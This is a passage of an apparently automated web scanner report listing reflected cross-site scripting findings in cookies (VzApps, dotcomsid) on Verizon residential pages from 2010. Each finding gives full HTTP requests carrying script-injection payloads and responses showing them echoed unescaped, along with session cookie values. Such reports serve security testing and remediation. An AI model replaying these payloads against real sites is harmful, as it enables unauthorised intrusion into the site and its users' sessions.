ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 161440
Expires: Sat, 20 Nov 2010 03:00:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:00:39 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<script type="text/javascript">
function startmenu()
{
}
var mvzOptIn="N";
var strdotcomval = "29ff7"-alert(1)-"213bd3ed367"
if(mvzOptIn != 'Y' || strdotcomval == "")
{
    var m_view = new VZT.MasterNavView();
    var m_model = {container: document.getElementB
...[SNIP]...

3.275. https://www22.verizon.com/Residential/FiOSTV/ [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSTV/

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 86006<script>alert(1)</script>84bd500f181 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX86006<script>alert(1)</script>84bd500f181; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 109086
Expires: Sat, 20 Nov 2010 02:55:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:55:36 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:55:36 GMT; path=/
Set-Cookie: ContextInfo_State=TX86006<script>alert(1)</script>84bd500f181; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:55:36 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:55:36 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:55:36 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX86006<SCRIPT>ALERT(1)</SCRIPT>84BD500F181 </DIV>
...[SNIP]...

3.276. https://www22.verizon.com/Residential/FiOSTV/ [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSTV/

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f06b1'><script>alert(1)</script>fc2813f1a29 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXf06b1'><script>alert(1)</script>fc2813f1a29; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 110632
Expires: Sat, 20 Nov 2010 02:55:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:55:34 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:55:34 GMT; path=/
Set-Cookie: ContextInfo_State=TXf06b1'><script>alert(1)</script>fc2813f1a29; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:55:34 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:55:34 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:55:34 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXF06B1'><SCRIPT>ALERT(1)</SCRIPT>FC2813F1A29 ' />
...[SNIP]...

3.277. https://www22.verizon.com/Residential/FiOSTV/ [dotcomsid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSTV/

Issue detail

The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b10ba"-alert(1)-"93515101fac was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Residential/FiOSTV/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=b10ba"-alert(1)-"93515101fac; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 115390
Expires: Sat, 20 Nov 2010 02:55:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:55:26 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:55:26 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:55:26 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:55:26 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:55:26 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<script type="text/javascript">
function startmenu()
{
}
var mvzOptIn="N";
var strdotcomval = "b10ba"-alert(1)-"93515101fac"
if(mvzOptIn != 'Y' || strdotcomval == "")
{
    var m_view = new VZT.MasterNavView();
    var m_model = {container: document.getElementB
...[SNIP]...

3.278. https://www22.verizon.com/Residential/FiOSTV/Channels/Channels.htm [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/FiOSTV/Channels/Channels.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload dcef1'><script>alert(1)</script>614ae10fb65 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Channels/Channels.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXdcef1'><script>alert(1)</script>614ae10fb65; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; 